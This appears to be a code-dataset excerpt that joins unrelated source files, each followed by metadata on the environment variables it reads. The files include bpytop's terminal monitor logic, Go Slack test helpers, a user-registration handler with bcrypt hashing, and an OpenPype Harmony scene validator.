setattr(CONFIG, selected, CONFIG.cpu_percent_fields[cpu_graph_i[selected]])
setattr(CpuCollector, selected.replace("_graph", ""), [])
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "temp_scale":
if key == "left":
temp_scale_i -= 1
if temp_scale_i < 0: temp_scale_i = len(CONFIG.temp_scales) - 1
if key == "right":
temp_scale_i += 1
if temp_scale_i > len(CONFIG.temp_scales) - 1: temp_scale_i = 0
CONFIG.temp_scale = CONFIG.temp_scales[temp_scale_i]
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "cpu_sensor" and len(CONFIG.cpu_sensors) > 1:
if key == "left":
cpu_sensor_i -= 1
if cpu_sensor_i < 0: cpu_sensor_i = len(CONFIG.cpu_sensors) - 1
elif key == "right":
cpu_sensor_i += 1
if cpu_sensor_i > len(CONFIG.cpu_sensors) - 1: cpu_sensor_i = 0
Collector.collect_idle.wait()
CpuCollector.sensor_swap = True
CONFIG.cpu_sensor = CONFIG.cpu_sensors[cpu_sensor_i]
if CONFIG.check_temp and (CpuCollector.sensor_method != "psutil" or CONFIG.cpu_sensor == "Auto"):
CpuCollector.get_sensors()
Term.refresh(force=True)
cls.resized = False
elif key in ["up", "mouse_scroll_up"]:
selected_int -= 1
if selected_int < 0: selected_int = len(option_items) - 1
page = floor(selected_int * 2 / h) + 1
elif key in ["down", "mouse_scroll_down"]:
selected_int += 1
if selected_int > len(option_items) - 1: selected_int = 0
page = floor(selected_int * 2 / h) + 1
elif key == "page_up":
if not pages or page == 1:
selected_int = 0
else:
page -= 1
if page < 1: page = pages
selected_int = (page-1) * ceil(h / 2)
elif key == "page_down":
if not pages or page == pages:
selected_int = len(option_items) - 1
else:
page += 1
if page > pages: page = 1
selected_int = (page-1) * ceil(h / 2)
elif has_sel:
pass
else:
redraw = False
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
class Timer:
timestamp: float
return_zero = False
@classmethod
def stamp(cls):
cls.timestamp = time()
@classmethod
def not_zero(cls) -> bool:
if cls.return_zero:
cls.return_zero = False
return False
return cls.timestamp + (CONFIG.update_ms / 1000) > time()
@classmethod
def left(cls) -> float:
t_left: float = cls.timestamp + (CONFIG.update_ms / 1000) - time()
if t_left > CONFIG.update_ms / 1000:
cls.stamp()
return CONFIG.update_ms / 1000
return t_left
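#* finish() forces the timer to register as expired so the main loop runs a collection immediately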
@classmethod
def finish(cls):
cls.return_zero = True
cls.timestamp = time() - (CONFIG.update_ms / 1000)
Key.break_wait()
class UpdateChecker:
version: str = VERSION
thread: threading.Thread
@classmethod
def run(cls):
cls.thread = threading.Thread(target=cls._checker)
cls.thread.start()
@classmethod
def _checker(cls):
try:
with urllib.request.urlopen("https://github.com/aristocratos/bpytop/raw/master/bpytop.py", timeout=5) as source: # type: ignore
for line in source:
line = line.decode("utf-8")
if line.startswith("VERSION: str ="):
cls.version = line[(line.index("=")+1):].strip('" \n')
break
except Exception as e:
errlog.exception(f'{e}')
else:
if cls.version != VERSION and which("notify-send"):
try:
subprocess.run(["notify-send", "-u", "normal", "BpyTop Update!",
f'New version of BpyTop available!\nCurrent version: {VERSION}\nNew version: {cls.version}\nDownload at github.com/aristocratos/bpytop',
"-i", "update-notifier", "-t", "10000"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
except Exception as e:
errlog.exception(f'{e}')
class Init:
running: bool = True
initbg_colors: List[str] = []
initbg_data: List[int]
initbg_up: Graph
initbg_down: Graph
resized = False
@classmethod
def start(cls):
Draw.buffer("init", z=1)
Draw.buffer("initbg", z=10)
for i in range(51):
for _ in range(2): cls.initbg_colors.append(Color.fg(i, i, i))
Draw.buffer("banner", (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(11)}{Colors.black_bg}{Colors.default}'
f'{Fx.b}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}{Color.fg("#50")}'), z=2)
for _i in range(7):
perc = f'{str(round((_i + 1) * 14 + 2)) + "%":>5}'
Draw.buffer("+banner", f'{Mv.to(Term.height // 2 - 2 + _i, Term.width // 2 - 28)}{Fx.trans(perc)}{Symbol.v_line}')
Draw.out("banner")
Draw.buffer("+init!", f'{Color.fg("#cc")}{Fx.b}{Mv.to(Term.height // 2 - 2, Term.width // 2 - 21)}{Mv.save}')
cls.initbg_data = [randint(0, 100) for _ in range(Term.width * 2)]
cls.initbg_up = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=True)
cls.initbg_down = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=False)
@classmethod
def success(cls):
if not CONFIG.show_init or cls.resized: return
cls.draw_bg(5)
Draw.buffer("+init!", f'{Mv.restore}{Symbol.ok}\n{Mv.r(Term.width // 2 - 22)}{Mv.save}')
@staticmethod
def fail(err):
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Symbol.fail}')
sleep(2)
errlog.exception(f'{err}')
clean_quit(1, errmsg=f'Error during init! See {CONFIG_DIR}/error.log for more information.')
@classmethod
def draw_bg(cls, times: int = 5):
for _ in range(times):
sleep(0.05)
x = randint(0, 100)
Draw.buffer("initbg", f'{Fx.ub}{Mv.to(0, 0)}{cls.initbg_up(x)}{Mv.to(Term.height // 2, 0)}{cls.initbg_down(x)}')
Draw.out("initbg", "banner", "init")
@classmethod
def done(cls):
cls.running = False
if not CONFIG.show_init: return
if cls.resized:
Draw.now(Term.clear)
else:
cls.draw_bg(10)
Draw.clear("initbg", "banner", "init", saved=True)
if cls.resized: return
del cls.initbg_up, cls.initbg_down, cls.initbg_data, cls.initbg_colors
#? Functions ------------------------------------------------------------------------------------->
def get_cpu_name() -> str:
'''Fetch a suitable CPU identifier from the CPU model name string'''
name: str = ""
nlist: List = []
command: str = ""
cmd_out: str = ""
rem_line: str = ""
if SYSTEM == "Linux":
command = "cat /proc/cpuinfo"
rem_line = "model name"
elif SYSTEM == "MacOS":
command ="sysctl -n machdep.cpu.brand_string"
elif SYSTEM == "BSD":
command ="sysctl hw.model"
rem_line = "hw.model"
try:
cmd_out = subprocess.check_output("LANG=C " + command, shell=True, universal_newlines=True)
except:
pass
if rem_line:
for line in cmd_out.split("\n"):
if rem_line in line:
name = re.sub( ".*" + rem_line + ".*:", "", line,1).lstrip()
else:
name = cmd_out
nlist = name.split(" ")
try:
if "Xeon" in name and "CPU" in name:
name = nlist[nlist.index("CPU")+(-1 if name.endswith(("CPU", "z")) else 1)]
elif "Ryzen" in name:
name = " ".join(nlist[nlist.index("Ryzen"):nlist.index("Ryzen")+3])
elif "Duo" in name and "@" in name:
name = " ".join(nlist[:nlist.index("@")])
elif "CPU" in name and not nlist[0] == "CPU" and not nlist[nlist.index("CPU")-1].isdigit():
name = nlist[nlist.index("CPU")-1]
except:
pass
name = name.replace("Processor", "").replace("CPU", "").replace("(R)", "").replace("(TM)", "").replace("Intel", "")
name = re.sub(r"\d?\.?\d+[mMgG][hH][zZ]", "", name)
name = " ".join(name.split())
return name
def get_cpu_core_mapping() -> List[int]:
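'''Map each logical CPU thread to a physical core id, parsed from /proc/cpuinfo on Linux, with a simple repeating fallback'''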
mapping: List[int] = []
core_ids: List[int] = []
if SYSTEM == "Linux" and os.path.isfile("/proc/cpuinfo"):
try:
mapping = [0] * THREADS
num = 0
with open("/proc/cpuinfo", "r") as f:
for line in f:
if line.startswith("processor"):
num = int(line.strip()[(line.index(": ")+2):])
if num > THREADS - 1:
break
elif line.startswith("core id"):
core_id = int(line.strip()[(line.index(": ")+2):])
if core_id not in core_ids:
core_ids.append(core_id)
mapping[num] = core_ids.index(core_id)
if num < THREADS - 1:
raise Exception
except:
mapping = []
if not mapping:
mapping = []
for _ in range(THREADS // CORES):
mapping.extend([x for x in range(CORES)])
return mapping
def create_box(x: int = 0, y: int = 0, width: int = 0, height: int = 0, title: str = "", title2: str = "", line_color: Color = None, title_color: Color = None, fill: bool = True, box = None) -> str:
'''Create a box from a box object or by given arguments'''
out: str = f'{Term.fg}{Term.bg}'
num: int = 0
if not line_color: line_color = THEME.div_line
if not title_color: title_color = THEME.title
#* Get values from box class if given
if box:
x = box.x
y = box.y
width = box.width
height = box.height
title = box.name
num = box.num
hlines: Tuple[int, int] = (y, y + height - 1)
out += f'{line_color}'
#* Draw all horizontal lines
for hpos in hlines:
out += f'{Mv.to(hpos, x)}{Symbol.h_line * (width - 1)}'
#* Draw all vertical lines and fill if enabled
for hpos in range(hlines[0]+1, hlines[1]):
out += f'{Mv.to(hpos, x)}{Symbol.v_line}{" " * (width-2) if fill else Mv.r(width-2)}{Symbol.v_line}'
#* Draw corners
out += f'{Mv.to(y, x)}{Symbol.left_up}\
{Mv.to(y, x + width - 1)}{Symbol.right_up}\
{Mv.to(y + height - 1, x)}{Symbol.left_down}\
{Mv.to(y + height - 1, x + width - 1)}{Symbol.right_down}'
#* Draw titles if enabled
if title:
numbered: str = "" if not num else f'{THEME.hi_fg(SUPERSCRIPT[num])}'
out += f'{Mv.to(y, x + 2)}{Symbol.title_left}{Fx.b}{numbered}{title_color}{title}{Fx.ub}{line_color}{Symbol.title_right}'
if title2:
out += f'{Mv.to(hlines[1], x + 2)}{Symbol.title_left}{title_color}{Fx.b}{title2}{Fx.ub}{line_color}{Symbol.title_right}'
return f'{out}{Term.fg}{Mv.to(y + 1, x + 1)}'
def now_sleeping(signum, frame):
"""Reset terminal settings and stop background input read before putting to sleep"""
Key.stop()
Collector.stop()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
os.kill(os.getpid(), signal.SIGSTOP)
def now_awake(signum, frame):
"""Set terminal settings and restart background input read"""
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
Key.start()
Term.refresh()
Box.calc_sizes()
Box.draw_bg()
Collector.start()
def quit_sigint(signum, frame):
"""SIGINT redirection to clean_quit()"""
clean_quit()
def clean_quit(errcode: int = 0, errmsg: str = "", thread: bool = False):
"""Stop background input read, save current config and reset terminal settings before quitting"""
global THREAD_ERROR
if thread:
THREAD_ERROR = errcode
interrupt_main()
return
if THREAD_ERROR: errcode = THREAD_ERROR
Key.stop()
Collector.stop()
if not errcode: CONFIG.save_config()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
if errcode == 0:
errlog.info(f'Exiting. Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
else:
errlog.warning(f'Exiting with errorcode ({errcode}). Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
if not errmsg: errmsg = f'Bpytop exited with errorcode ({errcode}). See {CONFIG_DIR}/error.log for more information!'
if errmsg: print(errmsg)
raise SystemExit(errcode)
def floating_humanizer(value: Union[float, int], bit: bool = False, per_second: bool = False, start: int = 0, short: bool = False) -> str:
'''Scales up in steps of 1024 to highest possible unit and returns string with unit suffixed
* bit=True or defaults to bytes
* start=int to set 1024 multiplier starting unit
* short=True always returns 0 decimals and shortens unit to 1 character
'''
out: str = ""
mult: int = 8 if bit else 1
selector: int = start
unit: Tuple[str, ...] = UNITS["bit"] if bit else UNITS["byte"]
if isinstance(value, float): value = round(value * 100 * mult)
elif value > 0: value *= 100 * mult
else: value = 0
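#* Value is scaled by 100 (two implied decimals); shift down in steps of 1024 and move up one unit until it fits in 5 digits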
while len(f'{value}') > 5 and value >= 102400:
value >>= 10
if value < 100:
out = f'{value}'
break
selector += 1
else:
if len(f'{value}') == 4 and selector > 0:
out = f'{value}'[:-2] + "." + f'{value}'[-2]
elif len(f'{value}') == 3 and selector > 0:
out = f'{value}'[:-2] + "." + f'{value}'[-2:]
elif len(f'{value}') >= 2:
out = f'{value}'[:-2]
else:
out = f'{value}'
if short:
if "." in out:
out = f'{round(float(out))}'
if len(out) > 3:
out = f'{int(out[0]) + 1}'
selector += 1
out += f'{"" if short else " "}{unit[selector][0] if short else unit[selector]}'
if per_second: out += "ps" if bit else "/s"
return out
def units_to_bytes(value: str) -> int:
if not value: return 0
out: int = 0
mult: int = 0
bit: bool = False
value_i: int = 0
units: Dict[str, int] = {"k" : 1, "m" : 2, "g" : 3}
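#* Strip a trailing "s", detect a "bit"/"byte" suffix, then apply any K/M/G prefix as a power of 1024 (bit values are converted to bytes)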
try:
if value.lower().endswith("s"):
value = value[:-1]
if value.lower().endswith("bit"):
bit = True
value = value[:-3]
elif value.lower().endswith("byte"):
value = value[:-4]
if value[-1].lower() in units:
mult = units[value[-1].lower()]
value = value[:-1]
if "." in value and value.replace(".", "").isdigit():
if mult > 0:
value_i = round(float(value) * 1024)
mult -= 1
else:
value_i = round(float(value))
elif value.isdigit():
value_i = int(value)
out = int(value_i) << (10 * mult)
if bit: out = round(out / 8)
except ValueError:
out = 0
return out
def min_max(value: int, min_value: int=0, max_value: int=100) -> int:
return max(min_value, min(value, max_value))
def readfile(file: str, default: str = "") -> str:
out: Union[str, None] = None
if os.path.isfile(file):
try:
with open(file, "r") as f:
out = f.read().strip()
except:
pass
return default if out is None else out
def temperature(value: int, scale: str = "celsius") -> Tuple[int, str]:
"""Returns a tuple with integer value and string unit converted from an integer in celsius to: celsius, fahrenheit, kelvin or rankine."""
if scale == "celsius":
return (value, "°C")
elif scale == "fahrenheit":
return (round(value * 1.8 + 32), "°F")
elif scale == "kelvin":
return (round(value + 273.15), "K ")
elif scale == "rankine":
return (round(value * 1.8 + 491.67), "°R")
else:
return (0, "")
def process_keys():
mouse_pos: Tuple[int, int] = (0, 0)
filtered: bool = False
box_keys = {"1" : "cpu", "2" : "mem", "3" : "net", "4" : "proc"}
while Key.has_key():
key = Key.get()
found: bool = True
if key in ["mouse_scroll_up", "mouse_scroll_down", "mouse_click"]:
mouse_pos = Key.get_mouse()
if mouse_pos[0] >= ProcBox.x and ProcBox.current_y + 1 <= mouse_pos[1] < ProcBox.current_y + ProcBox.current_h - 1:
pass
elif key == "mouse_click":
key = "mouse_unselect"
else:
key = "_null"
if ProcBox.filtering:
if key in ["enter", "mouse_click", "mouse_unselect"]:
ProcBox.filtering = False
Collector.collect(ProcCollector, redraw=True, only_draw=True)
continue
elif key in ["escape", "delete"]:
ProcCollector.search_filter = ""
ProcBox.filtering = False
elif len(key) == 1:
ProcCollector.search_filter += key
elif key == "backspace" and len(ProcCollector.search_filter) > 0:
ProcCollector.search_filter = ProcCollector.search_filter[:-1]
else:
continue
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
if filtered: Collector.collect_done.wait(0.1)
filtered = True
continue
if key == "_null":
continue
elif key == "q":
clean_quit()
elif key == "+" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "-" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key in ["M", "escape"]:
Menu.main()
elif key in ["o", "f2"]:
Menu.options()
elif key in ["H", "f1"]:
Menu.help()
elif key == "m":
if list(Box.view_modes).index(Box.view_mode) + 1 > len(list(Box.view_modes)) - 1:
Box.view_mode = list(Box.view_modes)[0]
else:
Box.view_mode = list(Box.view_modes)[(list(Box.view_modes).index(Box.view_mode) + 1)]
CONFIG.shown_boxes = " ".join(Box.view_modes[Box.view_mode])
Draw.clear(saved=True)
Term.refresh(force=True)
elif key in box_keys:
boxes = CONFIG.shown_boxes.split()
if box_keys[key] in boxes:
boxes.remove(box_keys[key])
else:
boxes.append(box_keys[key])
CONFIG.shown_boxes = " ".join(boxes)
Box.view_mode = "user"
Box.view_modes["user"] = CONFIG.shown_boxes.split()
Draw.clear(saved=True)
Term.refresh(force=True)
else:
found = False
if found: continue
if "proc" in Box.boxes:
if key in ["left", "right", "h", "l"]:
ProcCollector.sorting(key)
elif key == " " and CONFIG.proc_tree and ProcBox.selected > 0:
if ProcBox.selected_pid in ProcCollector.collapsed:
ProcCollector.collapsed[ProcBox.selected_pid] = not ProcCollector.collapsed[ProcBox.selected_pid]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "e":
CONFIG.proc_tree = not CONFIG.proc_tree
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "r":
CONFIG.proc_reversed = not CONFIG.proc_reversed
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "c":
CONFIG.proc_per_core = not CONFIG.proc_per_core
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key in ["f", "F", "/"]:
ProcBox.filtering = True
ProcCollector.case_sensitive = key == "F"
if not ProcCollector.search_filter: ProcBox.start = 0
Collector.collect(ProcCollector, redraw=True, only_draw=True)
elif key in ["T", "K", "I"] and (ProcBox.selected > 0 or ProcCollector.detailed):
pid: int = ProcBox.selected_pid if ProcBox.selected > 0 else ProcCollector.detailed_pid # type: ignore
if psutil.pid_exists(pid):
if key == "T": sig = signal.SIGTERM
elif key == "K": sig = signal.SIGKILL
elif key == "I": sig = signal.SIGINT
try:
os.kill(pid, sig)
except Exception as e:
errlog.error(f'Exception when sending signal {sig} to pid {pid}')
errlog.exception(f'{e}')
elif key == "delete" and ProcCollector.search_filter:
ProcCollector.search_filter = ""
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key == "enter":
if ProcBox.selected > 0 and ProcCollector.detailed_pid != ProcBox.selected_pid and psutil.pid_exists(ProcBox.selected_pid):
ProcCollector.detailed = True
ProcBox.last_selection = ProcBox.selected
ProcBox.selected = 0
ProcCollector.detailed_pid = ProcBox.selected_pid
ProcBox.resized = True
Collector.proc_counter = 1
elif ProcCollector.detailed:
ProcBox.selected = ProcBox.last_selection
ProcBox.last_selection = 0
ProcCollector.detailed = False
ProcCollector.detailed_pid = None
ProcBox.resized = True
Collector.proc_counter = 1
else:
continue
ProcCollector.details = {}
ProcCollector.details_cpu = []
ProcCollector.details_mem = []
Graphs.detailed_cpu = NotImplemented
Graphs.detailed_mem = NotImplemented
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key in ["up", "down", "mouse_scroll_up", "mouse_scroll_down", "page_up", "page_down", "home", "end", "mouse_click", "mouse_unselect", "j", "k"]:
ProcBox.selector(key, mouse_pos)
if "net" in Box.boxes:
if key in ["b", "n"]:
NetCollector.switch(key)
elif key == "z":
NetCollector.reset = not NetCollector.reset
Collector.collect(NetCollector, redraw=True)
elif key == "y":
CONFIG.net_sync = not CONFIG.net_sync
Collector.collect(NetCollector, redraw=True)
elif key == "a":
NetCollector.auto_min = not NetCollector.auto_min
NetCollector.net_min = {"download" : -1, "upload" : -1}
Collector.collect(NetCollector, redraw=True)
if "mem" in Box.boxes:
if key == "g":
CONFIG.mem_graphs = not CONFIG.mem_graphs
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "s":
Collector.collect_idle.wait()
CONFIG.swap_disk = not CONFIG.swap_disk
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "d":
Collector.collect_idle.wait()
CONFIG.show_disks = not CONFIG.show_disks
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "i":
Collector.collect_idle.wait()
CONFIG.io_mode = not CONFIG.io_mode
Collector.collect(MemCollector, interrupt=True, redraw=True)
#? Pre main -------------------------------------------------------------------------------------->
CPU_NAME: str = get_cpu_name()
CORE_MAP: List[int] = get_cpu_core_mapping()
THEME: Theme
def main():
global THEME
Term.width = os.get_terminal_size().columns
Term.height = os.get_terminal_size().lines
#? Init -------------------------------------------------------------------------------------->
if DEBUG: TimeIt.start("Init")
#? Switch to alternate screen, clear screen, hide cursor, enable mouse reporting and disable input echo
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
#Term.refresh(force=True)
#? Start a thread checking for updates while running init
if CONFIG.update_check: UpdateChecker.run()
#? Draw banner and init status
if CONFIG.show_init and not Init.resized:
Init.start()
#? Load theme
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Loading theme and creating colors... ")}{Mv.save}')
try:
THEME = Theme(CONFIG.color_theme)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup boxes
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Doing some maths and drawing... ")}{Mv.save}')
try:
if CONFIG.check_temp: CpuCollector.get_sensors()
Box.calc_sizes()
Box.draw_bg(now=False)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup signal handlers for SIGSTP, SIGCONT, SIGINT and SIGWINCH
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Setting up signal handlers... ")}{Mv.save}')
try:
signal.signal(signal.SIGTSTP, now_sleeping) #* Ctrl-Z
signal.signal(signal.SIGCONT, now_awake) #* Resume
signal.signal(signal.SIGINT, quit_sigint) #* Ctrl-C
signal.signal(signal.SIGWINCH, Term.refresh) #* Terminal resized
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for reading keyboard input
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting input reader thread... ")}{Mv.save}')
try:
if isinstance(sys.stdin, io.TextIOWrapper) and sys.version_info >= (3, 7):
sys.stdin.reconfigure(errors="ignore") # type: ignore
Key.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for data collection and drawing
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting data collection and drawer thread... ")}{Mv.save}')
try:
Collector.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Collect data and draw to buffer
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Collecting data and drawing... ")}{Mv.save}')
try:
Collector.collect(draw_now=False)
pass
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Draw to screen
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Finishing up... ")}{Mv.save}')
try:
Collector.collect_done.wait()
except Exception as e:
Init.fail(e)
else:
Init.success()
Init.done()
Term.refresh()
Draw.out(clear=True)
if CONFIG.draw_clock:
Box.clock_on = True
if DEBUG: TimeIt.stop("Init")
#? Main loop ------------------------------------------------------------------------------------->
def run():
while not False:
Term.refresh()
Timer.stamp()
while Timer.not_zero():
if Key.input_wait(Timer.left()):
process_keys()
Collector.collect()
#? Start main loop
try:
run()
except Exception as e:
errlog.exception(f'{e}')
clean_quit(1)
else:
#? Quit cleanly even if false starts being true...
clean_quit()
if __name__ == "__main__":
main()
| [] | [] | ["USER", "TERMINAL_TITLE"] | [] | ["USER", "TERMINAL_TITLE"] | python | 2 | 0 |
rtm/rtm_test.go | package rtm_test
import (
"context"
"os"
"testing"
"time"
"github.com/lestrrat-go/slack"
)
var dmUser string
var isBot bool
var slackToken string
func init() {
slackToken = os.Getenv("SLACK_TOKEN")
dmUser = os.Getenv("TEST_DM_USER") // don't forget to include an "@"
if len(slackToken) > 0 {
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
cl := slack.New(slackToken)
res, err := cl.Auth().Test().Do(ctx)
if err == nil {
user, err := cl.Users().Info(res.UserID).Do(ctx)
if err == nil {
isBot = user.IsBot
}
}
}
}
func requireSlackToken(t *testing.T) bool {
if slackToken == "" {
t.Skip("SLACK_TOKEN not available")
return false
}
return true
}
func requireDMUser(t *testing.T) bool {
if dmUser == "" {
t.Skip("TEST_DM_USER not available")
return false
}
return true
}
func requireRealUser(t *testing.T) bool {
if !requireSlackToken(t) {
return false
}
if isBot {
t.Skip("User authenticated by the token is a bot.")
return false
}
return true
}
| ["\"SLACK_TOKEN\"", "\"TEST_DM_USER\""] | [] | ["TEST_DM_USER", "SLACK_TOKEN"] | [] | ["TEST_DM_USER", "SLACK_TOKEN"] | go | 2 | 0 |
unix-ffi/pwd/test_getpwnam.py | import pwd
import os
user = os.getenv("USER")
passwd = pwd.getpwnam(user)
assert passwd
assert isinstance(passwd, pwd.struct_passwd)
| [] | [] | ["USER"] | [] | ["USER"] | python | 1 | 0 |
api/internal/newuser/newuser.go | package newuser
import (
"encoding/json"
"log"
"net/http"
"os"
"github.com/flaviogf/conduit/api/internal/models"
"golang.org/x/crypto/bcrypt"
)
type NewUserRequest struct {
User NewUser `json:"user"`
}
type NewUser struct {
Username string `json:"username"`
Email string `json:"email"`
Password string `json:"password"`
}
type UserResponse struct {
User User `json:"user"`
}
type User struct {
Email string `json:"email"`
Token string `json:"token"`
Username string `json:"username"`
Bio string `json:"bio"`
Image string `json:"image"`
}
func NewUserHandler(rw http.ResponseWriter, r *http.Request) {
var body NewUserRequest
dec := json.NewDecoder(r.Body)
err := dec.Decode(&body)
if err != nil {
log.Println(err)
rw.WriteHeader(http.StatusUnprocessableEntity)
return
}
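// Hash the plaintext password with bcrypt (cost factor 8) before persisting the user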
passwordHash, err := bcrypt.GenerateFromPassword([]byte(body.User.Password), 8)
if err != nil {
log.Println(err)
rw.WriteHeader(http.StatusInternalServerError)
return
}
ctx, err := models.Context(r.Context())
if err != nil {
log.Println(err)
rw.WriteHeader(http.StatusInternalServerError)
return
}
user := models.NewUser(0, body.User.Username, body.User.Email, string(passwordHash), "", "")
err = user.Save(ctx)
if err != nil {
log.Println(err)
rw.WriteHeader(http.StatusInternalServerError)
_ = ctx.Value("tx").(models.Tx).Rollback()
return
}
_ = ctx.Value("tx").(models.Tx).Commit()
response := UserResponse{User{
user.Email,
user.Token(os.Getenv("CONDUIT_KEY")),
user.Username,
user.Bio,
user.Image,
}}
rw.WriteHeader(http.StatusCreated)
enc := json.NewEncoder(rw)
enc.Encode(response)
}
| ["\"CONDUIT_KEY\""] | [] | ["CONDUIT_KEY"] | [] | ["CONDUIT_KEY"] | go | 1 | 0 |
openpype/hosts/harmony/plugins/publish/validate_scene_settings.py | # -*- coding: utf-8 -*-
"""Validate scene settings."""
import os
import json
import re
import pyblish.api
from avalon import harmony
import openpype.hosts.harmony
class ValidateSceneSettingsRepair(pyblish.api.Action):
"""Repair the instance."""
label = "Repair"
icon = "wrench"
on = "failed"
def process(self, context, plugin):
"""Repair action entry point."""
expected = openpype.hosts.harmony.api.get_asset_settings()
asset_settings = _update_frames(dict.copy(expected))
asset_settings["frameStart"] = 1
asset_settings["frameEnd"] = asset_settings["frameEnd"] + \
asset_settings["handleEnd"]
openpype.hosts.harmony.api.set_scene_settings(asset_settings)
if not os.path.exists(context.data["scenePath"]):
self.log.info("correcting scene name")
scene_dir = os.path.dirname(context.data["currentFile"])
scene_path = os.path.join(
scene_dir, os.path.basename(scene_dir) + ".xstage"
)
harmony.save_scene_as(scene_path)
class ValidateSceneSettings(pyblish.api.InstancePlugin):
"""Ensure the scene settings are in sync with database."""
order = pyblish.api.ValidatorOrder
label = "Validate Scene Settings"
families = ["workfile"]
hosts = ["harmony"]
actions = [ValidateSceneSettingsRepair]
optional = True
# skip frameEnd check if asset contains any of:
frame_check_filter = ["_ch_", "_pr_", "_intd_", "_extd_"] # regex
# skip resolution check if Task name matches any of regex patterns
skip_resolution_check = ["render", "Render"] # regex
# skip frameStart, frameEnd check if Task name matches any of regex patt.
skip_timelines_check = [] # regex
def process(self, instance):
"""Plugin entry point."""
expected_settings = openpype.hosts.harmony.api.get_asset_settings()
self.log.info("scene settings from DB:".format(expected_settings))
expected_settings = _update_frames(dict.copy(expected_settings))
expected_settings["frameEndHandle"] = expected_settings["frameEnd"] +\
expected_settings["handleEnd"]
if (any(re.search(pattern, os.getenv('AVALON_TASK'))
for pattern in self.skip_resolution_check)):
expected_settings.pop("resolutionWidth")
expected_settings.pop("resolutionHeight")
entity_type = expected_settings.get("entityType")
if (any(re.search(pattern, entity_type)
for pattern in self.skip_timelines_check)):
expected_settings.pop('frameStart', None)
expected_settings.pop('frameEnd', None)
expected_settings.pop("entityType") # not useful after the check
asset_name = instance.context.data['anatomyData']['asset']
if any(re.search(pattern, asset_name)
for pattern in self.frame_check_filter):
expected_settings.pop("frameEnd")
# handle case where ftrack uses only two decimal places
# 23.976023976023978 vs. 23.98
fps = instance.context.data.get("frameRate")
if isinstance(instance.context.data.get("frameRate"), float):
fps = float(
"{:.2f}".format(instance.context.data.get("frameRate")))
self.log.debug("filtered settings: {}".format(expected_settings))
current_settings = {
"fps": fps,
"frameStart": instance.context.data["frameStart"],
"frameEnd": instance.context.data["frameEnd"],
"handleStart": instance.context.data.get("handleStart"),
"handleEnd": instance.context.data.get("handleEnd"),
"frameEndHandle": instance.context.data.get("frameEndHandle"),
"resolutionWidth": instance.context.data.get("resolutionWidth"),
"resolutionHeight": instance.context.data.get("resolutionHeight"),
}
self.log.debug("current scene settings {}".format(current_settings))
invalid_settings = []
for key, value in expected_settings.items():
if value != current_settings[key]:
invalid_settings.append({
"name": key,
"expected": value,
"current": current_settings[key]
})
if ((expected_settings["handleStart"]
or expected_settings["handleEnd"])
and invalid_settings):
msg = "Handles included in calculation. Remove handles in DB " +\
"or extend frame range in timeline."
invalid_settings[-1]["reason"] = msg
msg = "Found invalid settings:\n{}".format(
json.dumps(invalid_settings, sort_keys=True, indent=4)
)
assert not invalid_settings, msg
assert os.path.exists(instance.context.data.get("scenePath")), (
"Scene file not found (saved under wrong name)"
)
def _update_frames(expected_settings):
"""
Calculate proper frame range including handles set in DB.
Harmony requires rendering from 1, so frame range is always moved
to 1.
Args:
expected_settings (dict): pulled from DB
Returns:
modified expected_setting (dict)
"""
